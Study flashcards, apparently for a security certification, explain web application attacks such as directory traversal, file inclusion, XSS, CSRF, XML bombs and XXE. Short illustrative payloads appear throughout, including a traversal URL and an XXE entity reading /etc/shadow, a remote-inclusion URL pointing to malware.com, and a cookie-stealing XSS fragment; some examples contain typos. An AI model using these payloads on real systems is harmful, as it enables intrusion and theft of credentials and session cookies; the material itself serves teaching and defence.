Section 11: Application Attacks Flashcards
Directory Traversal
website.com/../../../../../etc/shadow
▪ Attackers may try to use %2E%2E%2F instead of ../
File Inclusion
▪ Allows an attacker to download a file from an arbitrary location or upload an executable or script file to open a backdoor
▪ Remote File Inclusion
● Executes a script to inject a remote file into the web app or the
website
website.com/login.php?user=bob
website.com/login.php?http://malware.com/script.php
▪ Local File Inclusion
● Adds a file to the web app or website that already exists on the
hosting server
Uploading a profile picture
Cross-Site Scripting (XSS)
Injects a malicious script into a trusted site to compromise the site’s visitors
Types
● Non-Persistent XSS
o Happens once
manually inputting into a field such as a username or password
● Persistent XSS
o Embedded code
comment on a blog site
Method
● Attacker identifies input validation vulnerability within a trusted
website
● Attacker crafts a URL to perform code injection against the
trusted website
● The trusted site returns a page containing the malicious code
injected
● Malicious code runs in the client’s browser with permission level
as the trusted site
This is about compromising the user, not the web server. This usually requires user interaction (clicking on the malicious link) and tricks the users system into running malicious code with the privilege of the trusted website.
https://website.com/searchq<script%20type=’applicaiton/javascript>alert(you’re dumb)</script>
DOM XSS
Regular XSS Attacks are considered ‘Server Side’ attacks since the code is technically being run by the server. DOM XSS is a client based attack
DOM (Document Object Model)controls how things are displayed in the clients browser
https://website.com/index.html#default=
alert(document.cookie)
This is attempting to access the user cookies within their browser. If you see anything related to ‘document’ (Literally the D in DOM) in an XSS, it is likely a DOM XSS.
Cookie
Text file used to store information about a user when they visit a website
● Non-Persistent Cookie (Session Cookie)
o Reside in memory
● Persistent Cookie
o Stored in browser cache
Session Hijacking
Disconnects a host and then replaces it with his or her own machine by spoofing the original host IP address
● Session cookie theft
● Non-random tokens
Session Prediction
Predicts a session token to hijack the session
▪ Session tokens must be generated using non-predictable algorithm and must not reveal any info about the session’s client
Cross-Site Request Forgery (CSRF)
Exploits a session that was started on another site and within the same web browser
The victim needs to have the attackers site open and be logged in to the target site at the same time in the same browser.
Example: A user has open the attackers website and then they log into their bank. The bank assigned the user a token. If the attacker is able to guess the session token, they can send a request through the users browser to the bank site and request a password reset or update the default email address, and the bank will do it because it thinks the request is coming from the user.
CSRF Prevention
● Ensure user-specific tokens are used in all form submissions
● Add randomness and prompt for additional information for
password resets
● Require users to enter their current password when changing it
Extensible Markup Language (XML)
Used by web apps for authentication, authorization, and other types of data exchange
XML Bomb (Billion Laughs Attack)
XML encodes entities that expand to exponential sizes, consuming
memory on the host and potentially crashing it
If you see ‘lol’ in XML code, it could be a XML Bomb
XML External Entity (XXE) Attack
Attempts to embed a request for a local resource
If you see something like “ENTITY xxe SYSTEM file:///etc/shadow” in the XML code, it could be an XXE
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
XML Denial of Service
